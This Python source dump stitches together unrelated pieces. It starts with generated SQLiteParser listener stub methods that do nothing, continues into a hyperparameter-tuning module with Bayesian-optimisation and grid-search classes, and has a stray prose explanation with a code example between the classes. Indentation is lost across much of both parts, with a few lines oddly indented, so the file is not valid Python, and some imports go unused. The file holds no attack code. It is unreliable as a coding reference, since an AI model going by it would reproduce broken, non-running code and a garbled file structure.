    # Exit a parse tree produced by SQLiteParser#create_view_stmt.
    def exitCreate_view_stmt(self, ctx: SQLiteParser.Create_view_stmtContext):
        pass

    # Enter a parse tree produced by SQLiteParser#create_virtual_table_stmt.
    def enterCreate_virtual_table_stmt(self, ctx: SQLiteParser.Create_virtual_table_stmtContext):
        pass

    # Exit a parse tree produced by SQLiteParser#create_virtual_table_stmt.
    def exitCreate_virtual_table_stmt(self, ctx: SQLiteParser.Create_virtual_table_stmtContext):
        pass

    # Enter a parse tree produced by SQLiteParser#with_clause.
    def enterWith_clause(self, ctx: SQLiteParser.With_clauseContext):
        pass

    # Exit a parse tree produced by SQLiteParser#with_clause.
    def exitWith_clause(self, ctx: SQLiteParser.With_clauseContext):
        pass

    # Enter a parse tree produced by SQLiteParser#cte_table_name.
    def enterCte_table_name(self, ctx: SQLiteParser.Cte_table_nameContext):
        pass

    # Exit a parse tree produced by SQLiteParser#cte_table_name.
    def exitCte_table_name(self, ctx: SQLiteParser.Cte_table_nameContext):
        pass

    # Enter a parse tree produced by SQLiteParser#recursive_cte.
    def enterRecursive_cte(self, ctx: SQLiteParser.Recursive_cteContext):
        pass

    # Exit a parse tree produced by SQLiteParser#recursive_cte.
    def exitRecursive_cte(self, ctx: SQLiteParser.Recursive_cteContext):
        pass

    # Enter a parse tree produced by SQLiteParser#common_table_expression.
    def enterCommon_table_expression(self, ctx: SQLiteParser.Common_table_expressionContext):
        pass

    # Exit a parse tree produced by SQLiteParser#common_table_expression.
    def exitCommon_table_expression(self, ctx: SQLiteParser.Common_table_expressionContext):
        pass

    # Enter a parse tree produced by SQLiteParser#delete_stmt.
    def enterDelete_stmt(self, ctx: SQLiteParser.Delete_stmtContext):
        pass

    # Exit a parse tree produced by SQLiteParser#delete_stmt.
    def exitDelete_stmt(self, ctx: SQLiteParser.Delete_stmtContext):
        pass

    # Enter a parse tree produced by SQLiteParser#delete_stmt_limited.
    def enterDelete_stmt_limited(self, ctx: SQLiteParser.Delete_stmt_limitedContext):
        pass

    # Exit a parse tree produced by SQLiteParser#delete_stmt_limited.
    def exitDelete_stmt_limited(self, ctx: SQLiteParser.Delete_stmt_limitedContext):
        pass

    # Enter a parse tree produced by SQLiteParser#detach_stmt.
    def enterDetach_stmt(self, ctx: SQLiteParser.Detach_stmtContext):
        pass

    # Exit a parse tree produced by SQLiteParser#detach_stmt.
    def exitDetach_stmt(self, ctx: SQLiteParser.Detach_stmtContext):
        pass
    # Enter a parse tree produced by SQLiteParser#drop_stmt.
    def enterDrop_stmt(self, ctx: SQLiteParser.Drop_stmtContext):
        pass

    # Exit a parse tree produced by SQLiteParser#drop_stmt.
    def exitDrop_stmt(self, ctx: SQLiteParser.Drop_stmtContext):
        pass

    # Enter a parse tree produced by SQLiteParser#expr.
    def enterExpr(self, ctx: SQLiteParser.ExprContext):
        pass

    # Exit a parse tree produced by SQLiteParser#expr.
    def exitExpr(self, ctx: SQLiteParser.ExprContext):
        pass

    # Enter a parse tree produced by SQLiteParser#raise_function.
    def enterRaise_function(self, ctx: SQLiteParser.Raise_functionContext):
        pass

    # Exit a parse tree produced by SQLiteParser#raise_function.
    def exitRaise_function(self, ctx: SQLiteParser.Raise_functionContext):
        pass

    # Enter a parse tree produced by SQLiteParser#literal_value.
    def enterLiteral_value(self, ctx: SQLiteParser.Literal_valueContext):
        pass

    # Exit a parse tree produced by SQLiteParser#literal_value.
    def exitLiteral_value(self, ctx: SQLiteParser.Literal_valueContext):
        pass

    # Enter a parse tree produced by SQLiteParser#insert_stmt.
    def enterInsert_stmt(self, ctx: SQLiteParser.Insert_stmtContext):
        pass

    # Exit a parse tree produced by SQLiteParser#insert_stmt.
    def exitInsert_stmt(self, ctx: SQLiteParser.Insert_stmtContext):
        pass

    # Enter a parse tree produced by SQLiteParser#upsert_clause.
    def enterUpsert_clause(self, ctx: SQLiteParser.Upsert_clauseContext):
        pass

    # Exit a parse tree produced by SQLiteParser#upsert_clause.
    def exitUpsert_clause(self, ctx: SQLiteParser.Upsert_clauseContext):
        pass

    # Enter a parse tree produced by SQLiteParser#pragma_stmt.
    def enterPragma_stmt(self, ctx: SQLiteParser.Pragma_stmtContext):
        pass

    # Exit a parse tree produced by SQLiteParser#pragma_stmt.
    def exitPragma_stmt(self, ctx: SQLiteParser.Pragma_stmtContext):
        pass

    # Enter a parse tree produced by SQLiteParser#pragma_value.
    def enterPragma_value(self, ctx: SQLiteParser.Pragma_valueContext):
        pass

    # Exit a parse tree produced by SQLiteParser#pragma_value.
    def exitPragma_value(self, ctx: SQLiteParser.Pragma_valueContext):
        pass

    # Enter a parse tree produced by SQLiteParser#reindex_stmt.
    def enterReindex_stmt(self, ctx: SQLiteParser.Reindex_stmtContext):
        pass

    # Exit a parse tree produced by SQLiteParser#reindex_stmt.
    def exitReindex_stmt(self, ctx: SQLiteParser.Reindex_stmtContext):
        pass

    # Enter a parse tree produced by SQLiteParser#select_stmt.
    def enterSelect_stmt(self, ctx: SQLiteParser.Select_stmtContext):
        pass

    # Exit a parse tree produced by SQLiteParser#select_stmt.
    def exitSelect_stmt(self, ctx: SQLiteParser.Select_stmtContext):
        pass
    # Enter a parse tree produced by SQLiteParser#join_clause.
    def enterJoin_clause(self, ctx: SQLiteParser.Join_clauseContext):
        pass

    # Exit a parse tree produced by SQLiteParser#join_clause.
    def exitJoin_clause(self, ctx: SQLiteParser.Join_clauseContext):
        pass

    # Enter a parse tree produced by SQLiteParser#select_core.
    def enterSelect_core(self, ctx: SQLiteParser.Select_coreContext):
        pass

    # Exit a parse tree produced by SQLiteParser#select_core.
    def exitSelect_core(self, ctx: SQLiteParser.Select_coreContext):
        pass

    # Enter a parse tree produced by SQLiteParser#factored_select_stmt.
    def enterFactored_select_stmt(self, ctx: SQLiteParser.Factored_select_stmtContext):
        pass

    # Exit a parse tree produced by SQLiteParser#factored_select_stmt.
    def exitFactored_select_stmt(self, ctx: SQLiteParser.Factored_select_stmtContext):
        pass

    # Enter a parse tree produced by SQLiteParser#simple_select_stmt.
    def enterSimple_select_stmt(self, ctx: SQLiteParser.Simple_select_stmtContext):
        pass

    # Exit a parse tree produced by SQLiteParser#simple_select_stmt.
    def exitSimple_select_stmt(self, ctx: SQLiteParser.Simple_select_stmtContext):
        pass

    # Enter a parse tree produced by SQLiteParser#compound_select_stmt.
    def enterCompound_select_stmt(self, ctx: SQLiteParser.Compound_select_stmtContext):
        pass

    # Exit a parse tree produced by SQLiteParser#compound_select_stmt.
    def exitCompound_select_stmt(self, ctx: SQLiteParser.Compound_select_stmtContext):
        pass

    # Enter a parse tree produced by SQLiteParser#table_or_subquery.
    def enterTable_or_subquery(self, ctx: SQLiteParser.Table_or_subqueryContext):
        pass

    # Exit a parse tree produced by SQLiteParser#table_or_subquery.
    def exitTable_or_subquery(self, ctx: SQLiteParser.Table_or_subqueryContext):
        pass

    # Enter a parse tree produced by SQLiteParser#result_column.
    def enterResult_column(self, ctx: SQLiteParser.Result_columnContext):
        pass

    # Exit a parse tree produced by SQLiteParser#result_column.
    def exitResult_column(self, ctx: SQLiteParser.Result_columnContext):
        pass

    # Enter a parse tree produced by SQLiteParser#join_operator.
    def enterJoin_operator(self, ctx: SQLiteParser.Join_operatorContext):
        pass

    # Exit a parse tree produced by SQLiteParser#join_operator.
    def exitJoin_operator(self, ctx: SQLiteParser.Join_operatorContext):
        pass

    # Enter a parse tree produced by SQLiteParser#join_constraint.
    def enterJoin_constraint(self, ctx: SQLiteParser.Join_constraintContext):
        pass

    # Exit a parse tree produced by SQLiteParser#join_constraint.
    def exitJoin_constraint(self, ctx: SQLiteParser.Join_constraintContext):
        pass

    # Enter a parse tree produced by SQLiteParser#compound_operator.
    def enterCompound_operator(self, ctx: SQLiteParser.Compound_operatorContext):
        pass

    # Exit a parse tree produced by SQLiteParser#compound_operator.
    def exitCompound_operator(self, ctx: SQLiteParser.Compound_operatorContext):
        pass
    # Enter a parse tree produced by SQLiteParser#update_stmt.
    def enterUpdate_stmt(self, ctx: SQLiteParser.Update_stmtContext):
        pass

    # Exit a parse tree produced by SQLiteParser#update_stmt.
    def exitUpdate_stmt(self, ctx: SQLiteParser.Update_stmtContext):
        pass

    # Enter a parse tree produced by SQLiteParser#column_name_list.
    def enterColumn_name_list(self, ctx: SQLiteParser.Column_name_listContext):
        pass

    # Exit a parse tree produced by SQLiteParser#column_name_list.
    def exitColumn_name_list(self, ctx: SQLiteParser.Column_name_listContext):
        pass

    # Enter a parse tree produced by SQLiteParser#update_stmt_limited.
    def enterUpdate_stmt_limited(self, ctx: SQLiteParser.Update_stmt_limitedContext):
        pass

    # Exit a parse tree produced by SQLiteParser#update_stmt_limited.
    def exitUpdate_stmt_limited(self, ctx: SQLiteParser.Update_stmt_limitedContext):
        pass

    # Enter a parse tree produced by SQLiteParser#qualified_table_name.
    def enterQualified_table_name(self, ctx: SQLiteParser.Qualified_table_nameContext):
        pass

    # Exit a parse tree produced by SQLiteParser#qualified_table_name.
    def exitQualified_table_name(self, ctx: SQLiteParser.Qualified_table_nameContext):
        pass

    # Enter a parse tree produced by SQLiteParser#vacuum_stmt.
    def enterVacuum_stmt(self, ctx: SQLiteParser.Vacuum_stmtContext):
        pass

    # Exit a parse tree produced by SQLiteParser#vacuum_stmt.
    def exitVacuum_stmt(self, ctx: SQLiteParser.Vacuum_stmtContext):
        pass

    # Enter a parse tree produced by SQLiteParser#filter_clause.
    def enterFilter_clause(self, ctx: SQLiteParser.Filter_clauseContext):
        pass

    # Exit a parse tree produced by SQLiteParser#filter_clause.
    def exitFilter_clause(self, ctx: SQLiteParser.Filter_clauseContext):
        pass

    # Enter a parse tree produced by SQLiteParser#window_defn.
    def enterWindow_defn(self, ctx: SQLiteParser.Window_defnContext):
        pass

    # Exit a parse tree produced by SQLiteParser#window_defn.
    def exitWindow_defn(self, ctx: SQLiteParser.Window_defnContext):
        pass

    # Enter a parse tree produced by SQLiteParser#over_clause.
    def enterOver_clause(self, ctx: SQLiteParser.Over_clauseContext):
        pass

    # Exit a parse tree produced by SQLiteParser#over_clause.
    def exitOver_clause(self, ctx: SQLiteParser.Over_clauseContext):
        pass

    # Enter a parse tree produced by SQLiteParser#frame_spec.
    def enterFrame_spec(self, ctx: SQLiteParser.Frame_specContext):
        pass

    # Exit a parse tree produced by SQLiteParser#frame_spec.
    def exitFrame_spec(self, ctx: SQLiteParser.Frame_specContext):
        pass

    # Enter a parse tree produced by SQLiteParser#frame_clause.
    def enterFrame_clause(self, ctx: SQLiteParser.Frame_clauseContext):
        pass

    # Exit a parse tree produced by SQLiteParser#frame_clause.
    def exitFrame_clause(self, ctx: SQLiteParser.Frame_clauseContext):
        pass
    # Enter a parse tree produced by SQLiteParser#simple_function_invocation.
    def enterSimple_function_invocation(self, ctx: SQLiteParser.Simple_function_invocationContext):
        pass

    # Exit a parse tree produced by SQLiteParser#simple_function_invocation.
    def exitSimple_function_invocation(self, ctx: SQLiteParser.Simple_function_invocationContext):
        pass

    # Enter a parse tree produced by SQLiteParser#aggregate_function_invocation.
    def enterAggregate_function_invocation(self, ctx: SQLiteParser.Aggregate_function_invocationContext):
        pass

    # Exit a parse tree produced by SQLiteParser#aggregate_function_invocation.
    def exitAggregate_function_invocation(self, ctx: SQLiteParser.Aggregate_function_invocationContext):
        pass

    # Enter a parse tree produced by SQLiteParser#window_function_invocation.
    def enterWindow_function_invocation(self, ctx: SQLiteParser.Window_function_invocationContext):
        pass

    # Exit a parse tree produced by SQLiteParser#window_function_invocation.
    def exitWindow_function_invocation(self, ctx: SQLiteParser.Window_function_invocationContext):
        pass

    # Enter a parse tree produced by SQLiteParser#common_table_stmt.
    def enterCommon_table_stmt(self, ctx: SQLiteParser.Common_table_stmtContext):
        pass

    # Exit a parse tree produced by SQLiteParser#common_table_stmt.
    def exitCommon_table_stmt(self, ctx: SQLiteParser.Common_table_stmtContext):
        pass

    # Enter a parse tree produced by SQLiteParser#order_by_stmt.
    def enterOrder_by_stmt(self, ctx: SQLiteParser.Order_by_stmtContext):
        pass

    # Exit a parse tree produced by SQLiteParser#order_by_stmt.
    def exitOrder_by_stmt(self, ctx: SQLiteParser.Order_by_stmtContext):
        pass

    # Enter a parse tree produced by SQLiteParser#limit_stmt.
    def enterLimit_stmt(self, ctx: SQLiteParser.Limit_stmtContext):
        pass

    # Exit a parse tree produced by SQLiteParser#limit_stmt.
    def exitLimit_stmt(self, ctx: SQLiteParser.Limit_stmtContext):
        pass

    # Enter a parse tree produced by SQLiteParser#ordering_term.
    def enterOrdering_term(self, ctx: SQLiteParser.Ordering_termContext):
        pass

    # Exit a parse tree produced by SQLiteParser#ordering_term.
    def exitOrdering_term(self, ctx: SQLiteParser.Ordering_termContext):
        pass

    # Enter a parse tree produced by SQLiteParser#asc_desc.
    def enterAsc_desc(self, ctx: SQLiteParser.Asc_descContext):
        pass

    # Exit a parse tree produced by SQLiteParser#asc_desc.
    def exitAsc_desc(self, ctx: SQLiteParser.Asc_descContext):
        pass
# Enter a parse tree produced by SQLiteParser#frame_left.
def enterFrame_left(self, ctx: SQLiteParser.Frame_leftContext):
pass
# Exit a parse tree produced by SQLiteParser#frame_left.
def exitFrame_left(self, ctx: SQLiteParser.Frame_leftContext):
pass
# Enter a parse tree produced by SQLiteParser#frame_right.
def enterFrame_right(self, ctx: SQLiteParser.Frame_rightContext):
pass
# Exit a parse tree produced by SQLiteParser#frame_right.
def exitFrame_right(self, ctx: SQLiteParser.Frame_rightContext):
pass
# Enter a parse tree produced by SQLiteParser#frame_single.
def enterFrame_single(self, ctx: SQLiteParser.Frame_singleContext):
pass
# Exit a parse tree produced by SQLiteParser#frame_single.
def exitFrame_single(self, ctx: SQLiteParser.Frame_singleContext):
pass
# Enter a parse tree produced by SQLiteParser#window_function.
def enterWindow_function(self, ctx: SQLiteParser.Window_functionContext):
pass
# Exit a parse tree produced by SQLiteParser#window_function.
def exitWindow_function(self, ctx: SQLiteParser.Window_functionContext):
pass
# Enter a parse tree produced by SQLiteParser#of_OF_fset.
def enterOf_OF_fset(self, ctx: SQLiteParser.Of_OF_fsetContext):
pass
# Exit a parse tree produced by SQLiteParser#of_OF_fset.
def exitOf_OF_fset(self, ctx: SQLiteParser.Of_OF_fsetContext):
pass
# Enter a parse tree produced by SQLiteParser#default_DEFAULT__value.
def enterDefault_DEFAULT__value(self, ctx: SQLiteParser.Default_DEFAULT__valueContext):
pass
# Exit a parse tree produced by SQLiteParser#default_DEFAULT__value.
def exitDefault_DEFAULT__value(self, ctx: SQLiteParser.Default_DEFAULT__valueContext):
pass
# Enter a parse tree produced by SQLiteParser#partition_by.
def enterPartition_by(self, ctx: SQLiteParser.Partition_byContext):
pass
# Exit a parse tree produced by SQLiteParser#partition_by.
def exitPartition_by(self, ctx: SQLiteParser.Partition_byContext):
pass
# Enter a parse tree produced by SQLiteParser#order_by_expr.
def enterOrder_by_expr(self, ctx: SQLiteParser.Order_by_exprContext):
pass
# Exit a parse tree produced by SQLiteParser#order_by_expr.
def exitOrder_by_expr(self, ctx: SQLiteParser.Order_by_exprContext):
pass
# Enter a parse tree produced by SQLiteParser#order_by_expr_asc_desc.
def enterOrder_by_expr_asc_desc(self, ctx: SQLiteParser.Order_by_expr_asc_descContext):
pass
# Exit a parse tree produced by SQLiteParser#order_by_expr_asc_desc.
def exitOrder_by_expr_asc_desc(self, ctx: SQLiteParser.Order_by_expr_asc_descContext):
pass
# Enter a parse tree produced by SQLiteParser#expr_asc_desc.
def enterExpr_asc_desc(self, ctx: SQLiteParser.Expr_asc_descContext):
pass
# Exit a parse tree produced by SQLiteParser#expr_asc_desc.
def exitExpr_asc_desc(self, ctx: SQLiteParser.Expr_asc_descContext):
pass
# Enter a parse tree produced by SQLiteParser#initial_select.
def enterInitial_select(self, ctx: SQLiteParser.Initial_selectContext):
pass
# Exit a parse tree produced by SQLiteParser#initial_select.
def exitInitial_select(self, ctx: SQLiteParser.Initial_selectContext):
pass
# Enter a parse tree produced by SQLiteParser#recursive__select.
def enterRecursive__select(self, ctx: SQLiteParser.Recursive__selectContext):
pass
# Exit a parse tree produced by SQLiteParser#recursive__select.
def exitRecursive__select(self, ctx: SQLiteParser.Recursive__selectContext):
pass
# Enter a parse tree produced by SQLiteParser#unary_operator.
def enterUnary_operator(self, ctx: SQLiteParser.Unary_operatorContext):
pass
# Exit a parse tree produced by SQLiteParser#unary_operator.
def exitUnary_operator(self, ctx: SQLiteParser.Unary_operatorContext):
pass
# Enter a parse tree produced by SQLiteParser#error_message.
def enterError_message(self, ctx: SQLiteParser.Error_messageContext):
pass
# Exit a parse tree produced by SQLiteParser#error_message.
def exitError_message(self, ctx: SQLiteParser.Error_messageContext):
pass
# Enter a parse tree produced by SQLiteParser#module_argument.
def enterModule_argument(self, ctx: SQLiteParser.Module_argumentContext):
pass
# Exit a parse tree produced by SQLiteParser#module_argument.
def exitModule_argument(self, ctx: SQLiteParser.Module_argumentContext):
pass
# Enter a parse tree produced by SQLiteParser#column_alias.
def enterColumn_alias(self, ctx: SQLiteParser.Column_aliasContext):
pass
# Exit a parse tree produced by SQLiteParser#column_alias.
def exitColumn_alias(self, ctx: SQLiteParser.Column_aliasContext):
pass
# Enter a parse tree produced by SQLiteParser#keyword.
def enterKeyword(self, ctx: SQLiteParser.KeywordContext):
pass
# Exit a parse tree produced by SQLiteParser#keyword.
def exitKeyword(self, ctx: SQLiteParser.KeywordContext):
pass
# Enter a parse tree produced by SQLiteParser#name.
def enterName(self, ctx: SQLiteParser.NameContext):
pass
# Exit a parse tree produced by SQLiteParser#name.
def exitName(self, ctx: SQLiteParser.NameContext):
pass
# Enter a parse tree produced by SQLiteParser#function_name.
def enterFunction_name(self, ctx: SQLiteParser.Function_nameContext):
pass
# Exit a parse tree produced by SQLiteParser#function_name.
def exitFunction_name(self, ctx: SQLiteParser.Function_nameContext):
pass
# Enter a parse tree produced by SQLiteParser#schema_name.
def enterSchema_name(self, ctx: SQLiteParser.Schema_nameContext):
pass
# Exit a parse tree produced by SQLiteParser#schema_name.
def exitSchema_name(self, ctx: SQLiteParser.Schema_nameContext):
pass
# Enter a parse tree produced by SQLiteParser#table_name.
def enterTable_name(self, ctx: SQLiteParser.Table_nameContext):
pass
# Exit a parse tree produced by SQLiteParser#table_name.
def exitTable_name(self, ctx: SQLiteParser.Table_nameContext):
pass
# Enter a parse tree produced by SQLiteParser#table_or_index_name.
def enterTable_or_index_name(self, ctx: SQLiteParser.Table_or_index_nameContext):
pass
# Exit a parse tree produced by SQLiteParser#table_or_index_name.
def exitTable_or_index_name(self, ctx: SQLiteParser.Table_or_index_nameContext):
pass
# Enter a parse tree produced by SQLiteParser#new_table_name.
def enterNew_table_name(self, ctx: SQLiteParser.New_table_nameContext):
pass
# Exit a parse tree produced by SQLiteParser#new_table_name.
def exitNew_table_name(self, ctx: SQLiteParser.New_table_nameContext):
pass
# Enter a parse tree produced by SQLiteParser#column_name.
def enterColumn_name(self, ctx: SQLiteParser.Column_nameContext):
pass
# Exit a parse tree produced by SQLiteParser#column_name.
def exitColumn_name(self, ctx: SQLiteParser.Column_nameContext):
pass
# Enter a parse tree produced by SQLiteParser#collation_name.
def enterCollation_name(self, ctx: SQLiteParser.Collation_nameContext):
pass
# Exit a parse tree produced by SQLiteParser#collation_name.
def exitCollation_name(self, ctx: SQLiteParser.Collation_nameContext):
pass
# Enter a parse tree produced by SQLiteParser#foreign_table.
def enterForeign_table(self, ctx: SQLiteParser.Foreign_tableContext):
pass
# Exit a parse tree produced by SQLiteParser#foreign_table.
def exitForeign_table(self, ctx: SQLiteParser.Foreign_tableContext):
pass
# Enter a parse tree produced by SQLiteParser#index_name.
def enterIndex_name(self, ctx: SQLiteParser.Index_nameContext):
pass
# Exit a parse tree produced by SQLiteParser#index_name.
def exitIndex_name(self, ctx: SQLiteParser.Index_nameContext):
pass
# Enter a parse tree produced by SQLiteParser#trigger_name.
def enterTrigger_name(self, ctx: SQLiteParser.Trigger_nameContext):
pass
# Exit a parse tree produced by SQLiteParser#trigger_name.
def exitTrigger_name(self, ctx: SQLiteParser.Trigger_nameContext):
pass
# Enter a parse tree produced by SQLiteParser#view_name.
def enterView_name(self, ctx: SQLiteParser.View_nameContext):
pass
# Exit a parse tree produced by SQLiteParser#view_name.
def exitView_name(self, ctx: SQLiteParser.View_nameContext):
pass
# Enter a parse tree produced by SQLiteParser#module_name.
def enterModule_name(self, ctx: SQLiteParser.Module_nameContext):
pass
# Exit a parse tree produced by SQLiteParser#module_name.
def exitModule_name(self, ctx: SQLiteParser.Module_nameContext):
pass
# Enter a parse tree produced by SQLiteParser#pragma_name.
def enterPragma_name(self, ctx: SQLiteParser.Pragma_nameContext):
pass
# Exit a parse tree produced by SQLiteParser#pragma_name.
def exitPragma_name(self, ctx: SQLiteParser.Pragma_nameContext):
pass
# Enter a parse tree produced by SQLiteParser#savepoint_name.
def enterSavepoint_name(self, ctx: SQLiteParser.Savepoint_nameContext):
pass
# Exit a parse tree produced by SQLiteParser#savepoint_name.
def exitSavepoint_name(self, ctx: SQLiteParser.Savepoint_nameContext):
pass
# Enter a parse tree produced by SQLiteParser#table_alias.
def enterTable_alias(self, ctx: SQLiteParser.Table_aliasContext):
pass
# Exit a parse tree produced by SQLiteParser#table_alias.
def exitTable_alias(self, ctx: SQLiteParser.Table_aliasContext):
pass
# Enter a parse tree produced by SQLiteParser#transaction_name.
def enterTransaction_name(self, ctx: SQLiteParser.Transaction_nameContext):
pass
# Exit a parse tree produced by SQLiteParser#transaction_name.
def exitTransaction_name(self, ctx: SQLiteParser.Transaction_nameContext):
pass
# Enter a parse tree produced by SQLiteParser#window_name.
def enterWindow_name(self, ctx: SQLiteParser.Window_nameContext):
pass
# Exit a parse tree produced by SQLiteParser#window_name.
def exitWindow_name(self, ctx: SQLiteParser.Window_nameContext):
pass
# Enter a parse tree produced by SQLiteParser#alias.
def enterAlias(self, ctx: SQLiteParser.AliasContext):
pass
# Exit a parse tree produced by SQLiteParser#alias.
def exitAlias(self, ctx: SQLiteParser.AliasContext):
pass
# Enter a parse tree produced by SQLiteParser#filename.
def enterFilename(self, ctx: SQLiteParser.FilenameContext):
pass
# Exit a parse tree produced by SQLiteParser#filename.
def exitFilename(self, ctx: SQLiteParser.FilenameContext):
pass
# Enter a parse tree produced by SQLiteParser#base_window_name.
def enterBase_window_name(self, ctx: SQLiteParser.Base_window_nameContext):
pass
# Exit a parse tree produced by SQLiteParser#base_window_name.
def exitBase_window_name(self, ctx: SQLiteParser.Base_window_nameContext):
pass
# Enter a parse tree produced by SQLiteParser#simple_func.
def enterSimple_func(self, ctx: SQLiteParser.Simple_funcContext):
pass
# Exit a parse tree produced by SQLiteParser#simple_func.
def exitSimple_func(self, ctx: SQLiteParser.Simple_funcContext):
pass
# Enter a parse tree produced by SQLiteParser#aggregate_func.
def enterAggregate_func(self, ctx: SQLiteParser.Aggregate_funcContext):
pass
# Exit a parse tree produced by SQLiteParser#aggregate_func.
def exitAggregate_func(self, ctx: SQLiteParser.Aggregate_funcContext):
pass
# Enter a parse tree produced by SQLiteParser#table_function_name.
def enterTable_function_name(self, ctx: SQLiteParser.Table_function_nameContext):
pass
# Exit a parse tree produced by SQLiteParser#table_function_name.
def exitTable_function_name(self, ctx: SQLiteParser.Table_function_nameContext):
pass
# Enter a parse tree produced by SQLiteParser#any_name.
def enterAny_name(self, ctx: SQLiteParser.Any_nameContext):
pass
# Exit a parse tree produced by SQLiteParser#any_name.
def exitAny_name(self, ctx: SQLiteParser.Any_nameContext):
pass
del SQLiteParser
from sklearn.metrics import f1_score
from sklearn.model_selection import StratifiedKFold
from sklearn.model_selection import ParameterGrid, ParameterSampler
import numpy as np
from functools import partial
from skopt import space, gp_minimize
import time
import os
from tensorflow import keras
from kerastuner.tuners import BayesianOptimization as keras_BayesianOptimization
from kerastuner.tuners import RandomSearch as keras_Randomsearch
from kerastuner.tuners import Hyperband as keras_Hyperband
from tensorflow.keras.layers import Dense, Conv2D, MaxPool2D, Flatten
class call_back_bayesian:
def __init__(self):
self.time_stamps = []
self.accuracies = []
self.configs = []
self.all = []
self.start_time = time.time()
def time_stamp_call(self, res):
self.time_stamps.append(time.time())
def accuracy_call(self, res):
self.accuracies.append(res['func_vals'][-1])
def config_call(self, res):
self.configs.append(res['x_iters'][-1])
def all_call(self, res):
self.all.append(list(res.items()))
class Bayesian:
def __init__(
self,
model_callable,
param_space,
x_train,
y_train,
kfold_n_splits=5,
score_sign=-1,
score_measure=None,
x_test=None,
y_test=None
):
"""
@param model_callable:
@param param_space:
@param x_train:
@param y_train:
@param n_calls:
@param kfold_n_splits: this is used when no x_test, y_test given, cross validate score, but if x_test, y_test are given, not used
@param score_sign: -1 if we want to max the value return by score_measure, 1 if we want to min it
@param score_measure: default None for f1_score with avg is macro, callable for score calculation, take y_true as first arg, y_pred as second arg
@param x_test: test data set data
@param y_test: test data set label
"""
self.model = model_callable
self.x_train = x_train
self.y_train = y_train
self.x_test = x_test
self.y_test = y_test
self.param_space = []
self.param_names = []
for param_config in param_space:
self.param_names.append(param_config[-1])
if isinstance(param_config[0], list):
self.param_space.append(space.Categorical(param_config[0], name=param_config[-1]))
elif isinstance(param_config[0], float):
self.param_space.append(
space.Real(
low=param_config[0],
high=param_config[1],
prior='uniform',
name=param_config[-1]
)
)
elif isinstance(param_config[0], int):
self.param_space.append(
space.Integer(low=param_config[0], high=param_config[1], name=param_config[-1])
)
            else:
                raise TypeError(f'unsupported parameter space entry: {param_config}')
self.kfold_n_splits = kfold_n_splits
if score_measure is not None:
self.score_sign = score_sign
self.score_measure = score_measure
else:
self.score_measure = partial(f1_score, average='macro')
self.score_sign = -1
def bayesian_optimize(self, params, param_names, x, y, kfold_n_splits):
params = dict(zip(param_names, params))
model = self.model(**params)
if self.x_test is not None and self.y_test is not None:
model.fit(self.x_train, self.y_train)
pred = model.predict(self.x_test)
acc = self.score_measure(y_true=self.y_test, y_pred=pred)
return self.score_sign * acc
else:
kf = StratifiedKFold(n_splits=kfold_n_splits)
accuracies = []
for idx in kf.split(X=x, y=y):
train_idx, test_idx = idx[0], idx[1]
xtrain = x[train_idx]
ytrain = y[train_idx]
xtest = x[test_idx]
ytest = y[test_idx]
model.fit(xtrain, ytrain)
pred = model.predict(xtest)
fold_acc = self.score_measure(y_true=ytest, y_pred=pred)
accuracies.append(fold_acc)
            # score_sign is -1 when score_measure should be maximized (gp_minimize minimizes),
            # and +1 when the measure is already a loss to be minimized
            return self.score_sign * np.mean(accuracies)
def train(self, n_calls=10, verbose=True):
optimization_function = partial(
self.bayesian_optimize,
param_names=self.param_names,
x=self.x_train,
y=self.y_train,
kfold_n_splits=self.kfold_n_splits,
)
bayesian_callback = call_back_bayesian()
result = gp_minimize(
optimization_function,
dimensions=self.param_space,
n_calls=n_calls,
n_initial_points=10,
verbose=verbose,
callback=[
bayesian_callback.time_stamp_call, bayesian_callback.accuracy_call,
bayesian_callback.config_call, bayesian_callback.all_call
]
)
return result, bayesian_callback
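The default scorer and the `score_sign` convention used above can be sketched in isolation: `gp_minimize` only minimizes, so a score that should be maximized is negated before being handed to the optimizer. A minimal, self-contained sketch (the variable names are illustrative, not part of this module):

```python
from functools import partial
from sklearn.metrics import f1_score

# Default scorer used by the tuning classes: macro-averaged F1.
score_measure = partial(f1_score, average='macro')

# gp_minimize minimizes, so a score we want to maximize is negated
# via score_sign = -1 before being returned to the optimizer.
score_sign = -1
acc = score_measure(y_true=[0, 1, 1, 0], y_pred=[0, 1, 0, 0])
objective = score_sign * acc  # smaller objective == better f1
```

To recover the best F1 from the optimizer's result, negate again: best_f1 = -result.fun.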
class GridSearch:
def __init__(
self,
model_callable,
param_space,
x_train,
y_train,
kfold_n_splits=5,
score_measure=None,
x_test=None,
y_test=None
):
"""
@param model_callable:
@param param_space:
@param x_train:
@param y_train:
@param kfold_n_splits: this is used when no x_test, y_test given, cross validate score, but if x_test, y_test are given, not used
@param score_sign:
@param score_measure:
@param x_test:
@param y_test:
"""
self.search_space = ParameterGrid(param_space)
self.model = model_callable
self.x_train = x_train
self.y_train = y_train
self.x_test = x_test
self.y_test = y_test
self.kfold_n_splits = kfold_n_splits
self.highest_score = 0
self.lowest_score = 0
if score_measure is not None:
self.score_measure = score_measure
else:
self.score_measure = partial(f1_score, average='macro')
self.history = []
def train(self, verbose=True):
for index, params in enumerate(self.search_space):
if verbose:
print(f'Step {index+1} starts, {len(self.search_space)-index-1} steps remaining')
start_time = time.time()
model = self.model(**params)
if self.x_test is not None and self.y_test is not None:
model.fit(self.x_train, self.y_train)
pred = model.predict(self.x_test)
acc = self.score_measure(y_true=self.y_test, y_pred=pred)
# params, score, step_time
self.history.append((params, acc, time.time() - start_time))
else:
kf = StratifiedKFold(n_splits=self.kfold_n_splits)
accuracies = []
for idx in kf.split(X=self.x_train, y=self.y_train):
train_idx, test_idx = idx[0], idx[1]
xtrain = self.x_train[train_idx]
ytrain = self.y_train[train_idx]
xtest = self.x_train[test_idx]
ytest = self.y_train[test_idx]
model.fit(xtrain, ytrain)
pred = model.predict(xtest)
fold_acc = self.score_measure(y_true=ytest, y_pred=pred)
accuracies.append(fold_acc)
self.history.append((params, np.mean(accuracies), time.time() - start_time))
if index == 0:
self.highest_score = self.history[-1][1]
self.lowest_score = self.history[-1][1]
if self.history[-1][1] > self.highest_score:
self.highest_score = self.history[-1][1]
if self.history[-1][1] < self.lowest_score:
self.lowest_score = self.history[-1][1]
if verbose:
print(
                    f'Step {index+1} ends, time spent: {round(self.history[-1][-1], 2)}s, step score: {round(self.history[-1][1], 2)}, highest: {round(self.highest_score, 2)}, lowest: {round(self.lowest_score, 2)}'
)
print('**********************')
return sorted(self.history, key=lambda tup: tup[1], reverse=True)
